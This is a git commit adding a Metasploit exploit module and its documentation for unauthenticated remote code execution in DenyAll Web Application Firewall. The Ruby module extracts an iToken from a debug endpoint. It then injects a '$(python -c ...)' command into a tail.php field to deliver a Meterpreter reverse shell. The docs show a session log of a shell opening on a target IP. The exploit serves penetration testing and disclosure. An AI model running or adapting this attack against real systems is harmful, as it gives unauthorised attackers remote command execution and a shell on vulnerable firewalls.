Land rapid7#8980 unauth RCE for denyAll WAF

h00die · h00die · commit ddbff6ba3c96 · 2017-09-21T21:41:33.000-04:00
diff --git a/documentation/modules/exploit/linux/http/denyall_waf_exec.md b/documentation/modules/exploit/linux/http/denyall_waf_exec.md
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
+
+It's possible to have trial demo for 15 days at Amazon Marketplace.
+[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
+
+You just need to follow instruction above URL.
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+- [ ] Start `msfconsole`
+- [ ] `use use exploit/linux/http/denyall_exec`
+- [ ] Set `RHOST`
+- [ ] Set `LHOST`
+- [ ] Run `check`
+- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
+- [ ] Run `exploit`
+- [ ] **Verify** that you are seeing `iToken` value extraction.
+- [ ] **Verify** that you are getting `meterpreter` session.
+
+## Scenarios
+
+```
+msf > use exploit/linux/http/denyall_exec 
+msf exploit(denyall_exec) > 
+msf exploit(denyall_exec) > set RHOST 35.176.123.128
+RHOST => 35.176.123.128
+msf exploit(denyall_exec) > set LHOST 35.12.3.3
+LHOST => 35.12.3.3
+msf exploit(denyall_exec) > check
+[*] 35.176.123.128:3001 The target appears to be vulnerable.
+msf exploit(denyall_exec) > exploit 
+
+[*] Started reverse TCP handler on 35.12.3.3:4444 
+[*] Extracting iToken value from unauthenticated accessible endpoint.
+[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
+[*] Trigerring command injection vulnerability with  iToken value.
+[*] Sending stage (40411 bytes) to 35.176.123.128
+[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
+
+meterpreter > pwd
+/var/log/denyall/reverseproxy
+meterpreter >
+```
diff --git a/modules/exploits/linux/http/denyall_waf_exec.rb b/modules/exploits/linux/http/denyall_waf_exec.rb
@@ -0,0 +1,103 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "DenyAll Web Application Firewall Remote Code Execution",
+      'Description'    => %q{
+        This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
+        terminal command under the context of the web server user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => true,
+          'RPORT' => 3001,
+          'Payload'  => 'python/meterpreter/reverse_tcp'
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [[ 'Automatic', { }]],
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 19 2017",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
+      ]
+    )
+  end
+
+  def get_token
+    # Taking token by exploiting bug on first endpoint.
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
+      'vars_get' => {
+        'applianceUid' => 'LOCALUID',
+        'typeOf' => 'debug'
+      }
+    })
+
+    if res && res.code == 200 && res.body.include?("iToken")
+      res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
+    else
+       nil
+    end
+  end
+
+  def check
+    # If we've managed to get token, that means target is most likely vulnerable.
+    token = get_token
+    if token.nil?
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Appears
+    end
+  end
+
+  def exploit
+    # Get iToken from unauthenticated accessible endpoint
+    print_status('Extracting iToken value')
+    token = get_token
+
+    if token.nil?
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    else
+      print_good("Awesome. iToken value = #{token}")
+    end
+
+    # Accessing to the vulnerable second endpoint where we have command injection with valid iToken
+    print_status('Trigerring command injection vulnerability with iToken value.')
+    r = rand_text_alpha(5 + rand(3));
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
+      'vars_post' => {
+        'iToken' => token,
+        'tag' => 'tunnel',
+        'stime' => r,
+        'type' => "#{r}$(python -c \"#{payload.encoded}\")"
+        }
+    })
+
+  end
+end
